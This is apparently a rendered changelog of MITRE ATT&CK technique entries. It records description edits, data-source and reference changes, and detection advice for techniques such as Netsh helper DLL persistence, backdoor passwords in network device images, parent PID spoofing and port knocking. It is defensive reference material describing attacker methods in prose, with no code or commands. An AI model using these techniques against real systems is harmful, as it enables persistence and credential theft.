descriptionAdversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
external_references[1]['source_name']TechNet NetshDemaske Netsh Persistence
external_references[1]['description']Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.
external_references[1]['url']https://technet.microsoft.com/library/bb490939.aspxhttps://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
external_references[2]['source_name']Github Netsh Helper CS BeaconTechNet Netsh
external_references[2]['description']Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.
external_references[2]['url']https://github.com/outflankbv/NetshHelperBeaconhttps://technet.microsoft.com/library/bb490939.aspx
external_references[3]['source_name']Demaske Netsh PersistenceGithub Netsh Helper CS Beacon
external_references[3]['description']Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.
external_references[3]['url']https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.htmlhttps://github.com/outflankbv/NetshHelperBeacon
x_mitre_data_sources[0]Process: Process CreationModule: Module Load
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[3]Module: Module LoadWindows Registry: Windows Registry Key Modification
x_mitre_detectionIt is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence)

[T1498] Network Denial of Service

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 18:34:06.995000+00:002022-03-25 20:05:40.122000+00:00
x_mitre_data_sources[0]Sensor Health: Host StatusNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowSensor Health: Host Status

[T1556.004] Modify Authentication Process: Network Device Authentication

Current version: 2.0


Old Description
New Description
t1Adversaries may use [Patch System Image](https://attack.mitrt1Adversaries may use [Patch System Image](https://attack.mitr
>e.org/techniques/T1601/001) to hard code a password in the o>e.org/techniques/T1601/001) to hard code a password in the o
>perating system, thus bypassing of native authentication mec>perating system, thus bypassing of native authentication mec
>hanisms for local accounts on network devices.  [Modify Syst>hanisms for local accounts on network devices.  [Modify Syst
>em Image](https://attack.mitre.org/techniques/T1601) may inc>em Image](https://attack.mitre.org/techniques/T1601) may inc
>lude implanted code to the operating system for network devi>lude implanted code to the operating system for network devi
>ces to provide access for adversaries using a specific passw>ces to provide access for adversaries using a specific passw
>ord.  The modification includes a specific password which is>ord.  The modification includes a specific password which is
> implanted in the operating system image via the patch.  Upo> implanted in the operating system image via the patch.  Upo
>n authentication attempts, the inserted code will first chec>n authentication attempts, the inserted code will first chec
>k to see if the user input is the password. If so, access is>k to see if the user input is the password. If so, access is
> granted. Otherwise, the implanted code will pass the creden> granted. Otherwise, the implanted code will pass the creden
>tials on for verification of potentially valid credentials.(>tials on for verification of potentially valid credentials.(
>Citation: FireEye - Synful Knock)>Citation: Mandiant - Synful Knock)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 20:11:00.356000+00:002021-12-14 23:14:26.107000+00:00
descriptionAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)
external_references[1]['source_name']FireEye - Synful KnockMandiant - Synful Knock
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.htmlhttps://www.mandiant.com/resources/synful-knock-acis

[T1059.008] Command and Scripting Interpreter: Network Device CLI

Current version: 1.1


Old Description
New Description
t1Adversaries may abuse scripting or built-in command line intt1Adversaries may abuse scripting or built-in command line int
>erpreters (CLI) on network devices to execute malicious comm>erpreters (CLI) on network devices to execute malicious comm
>and and payloads. The CLI is the primary means through which>and and payloads. The CLI is the primary means through which
> users and administrators interact with the device in order > users and administrators interact with the device in order 
>to view system information, modify device operations, or per>to view system information, modify device operations, or per
>form diagnostic and administrative functions. CLIs typically>form diagnostic and administrative functions. CLIs typically
> contain various permission levels required for different co> contain various permission levels required for different co
>mmands.   Scripting interpreters automate tasks and extend f>mmands.   Scripting interpreters automate tasks and extend f
>unctionality beyond the command set included in the network >unctionality beyond the command set included in the network 
>OS. The CLI and scripting interpreter are accessible through>OS. The CLI and scripting interpreter are accessible through
> a direct console connection, or through remote means, such > a direct console connection, or through remote means, such 
>as telnet or [SSH](https://attack.mitre.org/techniques/T1021>as telnet or [SSH](https://attack.mitre.org/techniques/T1021
>/004).  Adversaries can use the network CLI to change how ne>/004).  Adversaries can use the network CLI to change how ne
>twork devices behave and operate. The CLI may be used to man>twork devices behave and operate. The CLI may be used to man
>ipulate traffic flows to intercept or manipulate data, modif>ipulate traffic flows to intercept or manipulate data, modif
>y startup configuration parameters to load malicious system >y startup configuration parameters to load malicious system 
>software, or to disable security features or logging to avoi>software, or to disable security features or logging to avoi
>d detection. (Citation: Cisco Synful Knock Evolution)>d detection.(Citation: Cisco Synful Knock Evolution)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'User']
values_changed
STIX FieldOld valueNew Value
modified2021-07-26 15:57:50.800000+00:002022-04-19 20:28:09.848000+00:00
descriptionAdversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)
external_references[1]['source_name']Cisco Synful Knock EvolutionCisco IOS Software Integrity Assurance - Command History
external_references[1]['description']Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.
external_references[1]['url']https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-deviceshttps://tools.cisco.com/security/center/resources/integrity_assurance.html#23
external_references[2]['source_name']Cisco IOS Software Integrity Assurance - Command HistoryCisco Synful Knock Evolution
external_references[2]['description']Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.
external_references[2]['url']https://tools.cisco.com/security/center/resources/integrity_assurance.html#23https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

[T1602.002] Data from Configuration Repository: Network Device Configuration Dump

Current version: 1.0


Old Description
New Description
t1Adversaries may access network configuration files to collect1Adversaries may access network configuration files to collec
>t sensitive data about the device and the network. The netwo>t sensitive data about the device and the network. The netwo
>rk configuration is a file containing parameters that determ>rk configuration is a file containing parameters that determ
>ine the operation of the device. The device typically stores>ine the operation of the device. The device typically stores
> an in-memory copy of the configuration while operating, and> an in-memory copy of the configuration while operating, and
> a separate configuration on non-volatile storage to load af> a separate configuration on non-volatile storage to load af
>ter device reset. Adversaries can inspect the configuration >ter device reset. Adversaries can inspect the configuration 
>files to reveal information about the target network and its>files to reveal information about the target network and its
> layout, the network device and its software, or identifying> layout, the network device and its software, or identifying
> legitimate accounts and credentials for later use.  Adversa> legitimate accounts and credentials for later use.  Adversa
>ries can use common management tools and protocols, such as >ries can use common management tools and protocols, such as 
>Simple Network Management Protocol (SNMP) and Smart Install >Simple Network Management Protocol (SNMP) and Smart Install 
>(SMI), to access network configuration files. (Citation: US->(SMI), to access network configuration files.(Citation: US-C
>CERT TA18-106A Network Infrastructure Devices 2018) (Citatio>ERT TA18-106A Network Infrastructure Devices 2018)(Citation:
>n: Cisco Blog Legacy Device Attacks) These tools may be used> Cisco Blog Legacy Device Attacks) These tools may be used t
> to query specific data from a configuration repository or c>o query specific data from a configuration repository or con
>onfigure the device to export the configuration for later an>figure the device to export the configuration for later anal
>alysis. >ysis. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 01:45:55.144000+00:002022-02-17 19:50:46.948000+00:00
descriptionAdversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use. Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.
x_mitre_data_sources[0]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentNetwork Traffic: Network Connection Creation
x_mitre_detectionIdentify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)

[T1095] Non-Application Layer Protocol

Current version: 2.1


Old Description
New Description
t1Adversaries may use a non-application layer protocol for comt1Adversaries may use a non-application layer protocol for com
>munication between host and C2 server or among infected host>munication between host and C2 server or among infected host
>s within a network. The list of possible protocols is extens>s within a network. The list of possible protocols is extens
>ive.(Citation: Wikipedia OSI) Specific examples include use >ive.(Citation: Wikipedia OSI) Specific examples include use 
>of network layer protocols, such as the Internet Control Mes>of network layer protocols, such as the Internet Control Mes
>sage Protocol (ICMP), transport layer protocols, such as the>sage Protocol (ICMP), transport layer protocols, such as the
> User Datagram Protocol (UDP), session layer protocols, such> User Datagram Protocol (UDP), session layer protocols, such
> as Socket Secure (SOCKS), as well as redirected/tunneled pr> as Socket Secure (SOCKS), as well as redirected/tunneled pr
>otocols, such as Serial over LAN (SOL).  ICMP communication >otocols, such as Serial over LAN (SOL).  ICMP communication 
>between hosts is one example.(Citation: Cisco Synful Knock E>between hosts is one example.(Citation: Cisco Synful Knock E
>volution)  Because ICMP is part of the Internet Protocol Sui>volution) Because ICMP is part of the Internet Protocol Suit
>te, it is required to be implemented by all IP-compatible ho>e, it is required to be implemented by all IP-compatible hos
>sts(Citation: Microsoft ICMP) however, it is not as common>ts.(Citation: Microsoft ICMP) However, it is not as commonly
>ly monitored as other Internet Protocols such as TCP or UDP > monitored as other Internet Protocols such as TCP or UDP an
>and may be used by adversaries to hide communications.>d may be used by adversaries to hide communications.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 19:41:49.412000+00:002022-02-17 15:38:54.578000+00:00
descriptionAdversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

[T1003] OS Credential Dumping

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 19:55:01.922000+00:002022-03-08 21:00:53.436000+00:00
x_mitre_data_sources[0]Process: Process CreationProcess: OS API Execution
x_mitre_data_sources[3]Windows Registry: Windows Registry Key AccessProcess: Process Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Access
x_mitre_data_sourcesProcess: Process Access
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Access
x_mitre_data_sourcesProcess: OS API Execution

[T1134.004] Access Token Manipulation: Parent PID Spoofing

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:11:20.296000+00:002022-05-03 02:15:42.360000+00:00
external_references[1]['source_name']DidierStevens SelectMyParent Nov 2009XPNSec PPID Nov 2017
external_references[1]['description']Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.
external_references[1]['url']https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/https://blog.xpnsec.com/becoming-system/
external_references[2]['source_name']Microsoft UAC Nov 2018CounterCept PPID Spoofing Dec 2018
external_references[2]['description']Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.
external_references[2]['url']https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-workshttps://www.countercept.com/blog/detecting-parent-pid-spoofing/
external_references[3]['source_name']CounterCept PPID Spoofing Dec 2018Microsoft UAC Nov 2018
external_references[3]['description']Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.
external_references[3]['url']https://www.countercept.com/blog/detecting-parent-pid-spoofing/https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works
external_references[4]['source_name']CTD PPID Spoofing Macro Mar 2019Microsoft Process Creation Flags May 2018
external_references[4]['description']Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.
external_references[4]['url']https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
external_references[5]['source_name']XPNSec PPID Nov 2017Secuirtyinbits Ataware3 May 2019
external_references[5]['description']Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.
external_references[5]['url']https://blog.xpnsec.com/becoming-system/https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
external_references[6]['source_name']Microsoft Process Creation Flags May 2018DidierStevens SelectMyParent Nov 2009
external_references[6]['description']Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.
external_references[6]['url']https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flagshttps://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/
external_references[7]['source_name']Secuirtyinbits Ataware3 May 2019CTD PPID Spoofing Macro Mar 2019
external_references[7]['description']Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.
external_references[7]['url']https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/
x_mitre_data_sources[0]Process: OS API ExecutionProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationProcess: OS API Execution
x_mitre_defense_bypassed[1]Host forensic analysisHost Forensic Analysis

[T1555.005] Credentials from Password Stores: Password Managers

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-06-21 17:58:03.269000+00:002022-03-25 13:18:55.310000+00:00
external_references[2]['url']https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdfhttps://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[2]Process: Process AccessProcess: OS API Execution
x_mitre_data_sources[3]Command: Command ExecutionProcess: Process Access

[T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable

Current version: 1.0

New Detections:

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 16:56:34.583000+00:002022-05-05 04:08:56.402000+00:00
x_mitre_data_sources[0]File: File CreationWindows Registry: Windows Registry Key Modification
x_mitre_defense_bypassed[0]Application controlApplication Control
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1574.009] Hijack Execution Flow: Path Interception by Unquoted Path

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesabsolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.
external_referencesCAPEC-38
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-38
external_referencesabsolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018.
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 19:05:23.755000+00:002022-10-18 20:51:38.118000+00:00
external_references[1]['source_name']capecWindows Privilege Escalation Guide
external_references[1]['url']https://capec.mitre.org/data/definitions/38.htmlhttps://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
external_references[2]['source_name']Microsoft CurrentControlSet ServicesWindows Unquoted Services
external_references[2]['description']Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020.HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.
external_references[2]['url']https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-treehttps://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/
external_references[4]['source_name']Windows Unquoted ServicesMicrosoft CurrentControlSet Services
external_references[4]['description']HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018.Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020.
external_references[4]['url']https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
external_references[5]['source_name']Windows Privilege Escalation Guidecapec
external_references[5]['url']https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/https://capec.mitre.org/data/definitions/38.html
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1566] Phishing

Current version: 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 17:39:13.604000+00:002022-01-04 13:57:16.959000+00:00
x_mitre_data_sources[0]File: File CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Application Log: Application Log ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_data_sources[3]Network Traffic: Network Traffic ContentFile: File Creation

[T1598] Phishing for Information

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:43:13.134000+00:002022-03-08 21:57:56.078000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content

[T1205.001] Traffic Signaling: Port Knocking

Current version: 1.1


Old Description
New Description
t1Adversaries may use port knocking to hide open ports used fot1Adversaries may use port knocking to hide open ports used fo
>r persistence or command and control. To enable a port, an a>r persistence or command and control. To enable a port, an a
>dversary sends a series of attempted connections to a predef>dversary sends a series of attempted connections to a predef
>ined sequence of closed ports. After the sequence is complet>ined sequence of closed ports. After the sequence is complet
>ed, opening a port is often accomplished by the host based f>ed, opening a port is often accomplished by the host based f
>irewall, but could also be implemented by custom software.  >irewall, but could also be implemented by custom software.  
>This technique has been observed to both for the dynamic ope>This technique has been observed both for the dynamic openin
>ning of a listening port as well as the initiating of a conn>g of a listening port as well as the initiating of a connect
>ection to a listening server on a different system.  The obs>ion to a listening server on a different system.  The observ
>ervation of the signal packets to trigger the communication >ation of the signal packets to trigger the communication can
>can be conducted through different methods. One means, origi> be conducted through different methods. One means, original
>nally implemented by Cd00r (Citation: Hartrell cd00r 2002), >ly implemented by Cd00r (Citation: Hartrell cd00r 2002), is 
>is to use the libpcap libraries to sniff for the packets in >to use the libpcap libraries to sniff for the packets in que
>question. Another method leverages raw sockets, which enable>stion. Another method leverages raw sockets, which enables t
>s the malware to use ports that are already open for use by >he malware to use ports that are already open for use by oth
>other programs.>er programs.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 01:26:31.804000+00:002022-03-11 18:31:23.996000+00:00
descriptionAdversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

[T1542] Pre-OS Boot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
